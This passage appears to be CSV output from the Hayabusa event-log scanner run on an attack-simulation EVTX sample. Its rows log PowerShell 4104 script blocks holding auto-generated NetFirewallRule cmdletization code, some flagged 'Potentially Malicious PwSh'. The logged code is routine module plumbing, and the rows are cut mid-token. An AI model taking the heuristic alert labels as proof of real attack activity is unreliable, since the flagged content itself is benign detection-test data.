$__cmdletization_queryBuild",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) 
$__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 